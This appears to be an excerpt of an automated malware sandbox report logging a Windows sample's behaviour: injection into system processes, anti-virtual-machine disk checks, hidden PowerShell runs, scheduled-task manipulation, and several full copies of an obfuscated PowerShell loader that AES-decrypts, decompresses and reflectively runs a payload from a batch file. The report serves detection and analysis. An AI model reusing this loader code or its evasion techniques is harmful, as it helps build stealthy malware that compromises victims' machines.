Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1130000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FED7750000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 178DCD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 224138D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 2BCD7E00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2125F030000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2C2340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 26504E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 16CE5E20000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 300000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2B90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 2E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 23BCC520000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 23BCC550000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1D865090000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F0520000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 199015D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CB2E610000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1CB2E640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 188D6710000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 29F37400000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DE3D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28DFE070000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 4EC0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 53A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 207F2840000

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:amvxseuhmbvc{param([outputtype([type])][parameter(position=0)][type[]]$uiloijomlvxjkf,[parameter(position=1)][type]$qydjyvedmn)$nmmwpnxadvf=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+'f'+'l'+[char](101)+''+[char](99)+'t'+[char](101)+''+'d'+''+[char](68)+''+[char](101)+''+[char](108)+'e'+[char](103)+''+[char](97)+'t'+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+'n'+[char](77)+''+[char](101)+'m'+[char](111)+''+[char](114)+''+'y'+''+[char](77)+''+'o'+''+[char](100)+'u'+[char](108)+'e',$false).definetype('m'+[char](121)+'d'+[char](101)+''+[char](108)+''+[char](101)+''+[char](103)+''+[char](97)+''+[char](116)+''+[char](101)+''+[char](84)+'y'+[char](112)+'e',''+'c'+''+[char](108)+''+'a'+''+[char](115)+''+'s'+''+[char](44)+''+[char](80)+'ub'+'l'+'i'+[char](99)+','+[char](83)+''+[char](101)+'a'+'l'+''+[char](101)+'d'+[char](44)+'an'+[char](115)+'icla'+'s'+''+[char](115)+','+[char](65)+''+[char](117)+'t'+[char](111)+''+[char](67)+''+'l'+'as'+[char](115)+'',[multicastdelegate]);$nmmwpnxadvf.defineconstructor('r'+[char](84)+'s'+'p'+''+'e'+''+'c'+''+[char](105)+''+[char](97)+''+[char](108)+''+[char](78)+''+'a'+''+'m'+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+'d'+[char](101)+''+[char](66)+''+[char](121)+'si'+'g'+','+[char](80)+''+[char](117)+'b'+[char](108)+''+'i'+'c',[reflection.callingconventions]::standard,$uiloijomlvxjkf).setimplementationflags('ru'+[char](110)+''+[char](116)+'i'+[char](109)+''+[char](101)+','+'m'+''+[char](97)+''+[char](110)+''+'a'+''+[char](103)+''+[char](101)+''+[char](100)+'');$nmmwpnxadvf.definemethod(''+'i'+''+[char](110)+'v'+'o'+''+[char](107)+'e',''+[char](80)+''+[char](117)+''+[char](98)+''+[char](108)+''+'i'+''+'c'+''+[char](44)+'h'+'i'+'d'+[char](101)+''+[char](66)+'y'+[char](83)+''+[char](105)+''+[char](103)+''+','+''+[char](78)+''+[char](101)+''+[char](119)+'slo'+'t'+','+[char](86)+''+[char](105)+''+[char](114)+''+'t'+''+[char](117)+''+'a'+'l',$qydjyvedmn,$uiloijomlvxjkf).setimplementationflags(''+'r'+'u'+[char](110)+''+'t'+''+'i'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+''+'n'+''+[char](97)+''+[char](103)+''+[char](101)+''+'d'+'');write-output $nmmwpnxadvf.createtype();}$swnyxvukgpflw=([appdomain]::currentdomain.getassemblies()\|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+'s'+'t'+'e'+''+[char](109)+''+'.'+'d'+'l'+''+'l'+'')}).gettype(''+[char](77)+''+[char](105)+''+'c'+'r'+[char](111)+''+[char](115)+''+[char](111)+''+[char](102)+'t.'+[char](87)+'i'+'n'+''+'3'+''+[char](50)+'.'+'u'+'n'+[char](115)+''+[char](97)+''+'f'+''+'e'+''+[char](78)+''+'a'+''+'t'+''+[char](105)+''+'v'+''+[char](101)+''+[char](77)+''+'e'+''+[char](116)+''+'h'+'o'+[char](100)+'s');$amujszcronxavl=$swny
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function rgueq($exedy){ $hkjec=[system.security.cryptography.aes]::create(); $hkjec.mode=[system.security.cryptography.ciphermode]::cbc; $hkjec.padding=[system.security.cryptography.paddingmode]::pkcs7; $hkjec.key=[system.convert]::frombase64string('/ali2v8pjeatw7ez9dibwbzxd0zilyov/cl0fcna0lq='); $hkjec.iv=[system.convert]::frombase64string('vzvm+ezoql4yxpctgzwmda=='); $hipti=$hkjec.createdecryptor(); $ioqge=$hipti.transformfinalblock($exedy, 0, $exedy.length); $hipti.dispose(); $hkjec.dispose(); $ioqge;}function qveui($exedy){ invoke-expression '$vcvep=new-object blcksblckyblcksblcktblckeblckmblck.blckiblckoblck.blckmblckeblckmblckoblckrblckystblckrblckeblckamblck(,$exedy);'.replace('blck', ''); invoke-expression '$mxjbu=new-object blcksblckyblcksblcktblckeblckm.blckiblckoblck.mblckeblckmblckoblckrblckyblcksblcktblckrblckeblckablckmblck;'.replace('blck', ''); invoke-expression '$mnylh=new-object sblckyblcksblcktblckeblckmblck.blckiblckoblck.blckcblckoblckmblckpblckrblckeblckssblckioblcknblck.gblckziblckpblcksblcktblckrblckeblckablckmblck($vcvep, [blckiblckoblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckcblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckmblckoblckdblckeblck]::dblckecblckomblckprblckesblcks);'.replace('blck', ''); $mnylh.copyto($mxjbu); $mnylh.dispose(); $vcvep.dispose(); $mxjbu.dispose(); $mxjbu.toarray();}function coezm($exedy,$gmyop){ invoke-expression '$ucfsw=blck[blcksblckyblcksblcktblckeblckmblck.blckrblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckablcksblcksblckeblckmblckbblcklblckyblck]blck::blcklblckoblckablckdblck([byte[]]$exedy);'.replace('blck', ''); invoke-expression '$tehqk=$ucfsw.blckeblcknblcktblckrblckyblckpblckoblckiblcknblcktblck;'.replace('blck', ''); invoke-expression '$tehqk.blckiblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gmyop)blck;'.replace('blck', '');}$tvqdd = 'c:\users\user\desktop\1.cmd';$host.ui.rawui.windowtitle = $tvqdd;$kjvvr=[system.io.file]::readalltext($tvqdd).split([environment]::newline);foreach ($ghynt in $kjvvr) { if ($ghynt.startswith(':: ')) { $envtr=$ghynt.substring(3); break; }}$ulnbj=[string[]]$envtr.split('\');invoke-expression '$hdtzf=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[0])));'.replace('blck', '');invoke-expression '$timgz=qveui (rgueq (blck[blckcblckoblcknblckvblckeblckrblcktblck]blck:blck:blckfblckrblckoblckmblckbblckablcksblckeblck6blck4blcksblcktblckrblckiblcknblckgblck($ulnbj[1])));'.replace('blck', '');coezm $hdtzf (,[string[]] (''));coezm $timgz (,[string[]] (''));	Jump to behavior
